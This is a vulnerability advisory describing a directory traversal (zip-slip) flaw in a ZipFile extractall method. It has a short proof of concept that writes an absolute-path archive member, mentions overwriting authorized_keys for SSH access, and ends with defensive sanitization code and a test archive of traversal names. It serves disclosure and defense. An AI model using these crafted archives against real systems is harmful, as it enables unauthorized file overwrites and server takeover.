Description

The extract and extractall methods in the ZipFile class are vulnerable to directory traversal attacks, allowing files to be written anywhere on disk, regardless of the target path specified by the developer.

A detailed description of the vulnerability is available on our webpage:
Proof of Concept

If we create a zip archive with the following code:

    import pyzipper
    import time

    # Write a single member whose stored name is an absolute path.
    with pyzipper.ZipFile("exploit.zip", 'w', compression=pyzipper.ZIP_LZMA) as zf:
        zip_info = zf.zipinfo_cls(filename="/tmp/vulnerable.txt", date_time=time.localtime(time.time())[:6])
        zf.writestr(zip_info, "vulnerable")
Then we can extract the created archive using the extractall method:

    from libarchive.zip import ZipFile

    with ZipFile("exploit.zip", mode="r") as archive:
        archive.extractall(path="./")

After extracting the archive using the extractall method, the vulnerable.txt file will be created in the /tmp directory with the contents "vulnerable", even though "./" was given as the extraction path.
Possible Impact

This vulnerability can be exploited, for example, to overwrite the authorized_keys file in a user's home directory, enabling an attacker to connect to the affected server via SSH.
Summary

A fix for this vulnerability is available in pull request #41, which adds additional filename sanitization.
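The following is an added example of the kind of filename sanitization a safe extractor needs; it is not the project's code and not the contents of pull request #41. It uses only the Python standard library (zipfile rather than libarchive.zip) and a constructed in-memory archive that mirrors the proof of concept above: one benign member, one absolute-path member and one "../" member. Each member name is resolved against the destination directory and rejected unless it lands inside it; symlink members are also skipped, since a symlink written early in the archive could redirect later members outside the destination. All function names here are illustrative.

```python
import io
import os
import stat
import tempfile
import zipfile


def is_safe_member(name, dest):
    """Return True only if extracting member `name` under `dest` stays inside `dest`."""
    if not name:
        return False
    # Reject absolute paths outright (POSIX "/..." and Windows drive or UNC forms).
    if name.startswith(("/", "\\")) or os.path.splitdrive(name)[0]:
        return False
    dest_real = os.path.realpath(dest)
    # realpath collapses ".." components, so "a/../b.txt" is accepted but "../x" is not.
    target = os.path.realpath(os.path.join(dest_real, name))
    return target == dest_real or target.startswith(dest_real + os.sep)


def is_symlink_member(info):
    """Unix-created archives store the file mode in the high 16 bits of external_attr."""
    return stat.S_ISLNK(info.external_attr >> 16)


def audit_archive(data, dest):
    """Classify every member of a zip (given as bytes) as safe or rejected for `dest`."""
    verdict = {"safe": [], "rejected": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if is_safe_member(info.filename, dest) and not is_symlink_member(info):
                verdict["safe"].append(info.filename)
            else:
                verdict["rejected"].append(info.filename)
    return verdict


def safe_extractall(data, dest):
    """Extract only members that resolve inside `dest`; returns the paths written.

    The check and the write happen in the same pass over the archive, so there
    is no window in which a re-read archive could differ from the audited one.
    """
    written = []
    os.makedirs(dest, exist_ok=True)
    dest_real = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not is_safe_member(info.filename, dest) or is_symlink_member(info):
                continue
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def build_sample_archive():
    """Constructed sample archive: a benign member plus two traversal attempts.

    zipfile.writestr stores the given name verbatim, which is what makes it
    usable for building a test input for the checker.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docs/readme.txt", "benign")
        zf.writestr("/tmp/vulnerable.txt", "vulnerable")   # absolute path, as in the PoC
        zf.writestr("../../outside.txt", "vulnerable")     # parent-directory traversal
    return buf.getvalue()


def run_demo():
    """Audit and safely extract the sample into a fresh temporary directory."""
    data = build_sample_archive()
    dest = tempfile.mkdtemp(prefix="safe_unzip_")
    verdict = audit_archive(data, dest)
    written = safe_extractall(data, dest)
    rel = [os.path.relpath(p, os.path.realpath(dest)).replace(os.sep, "/") for p in written]
    return verdict, rel


if __name__ == "__main__":
    print(run_demo())
```

The key property is that the decision is made on the resolved target path, not on the raw member name: a leading "/" and a ".." component are only two of the ways a name can escape the destination, and checking the resolved path covers all of them at once. Rejected members should be logged rather than silently dropped, since their presence is a strong signal that the archive is hostile.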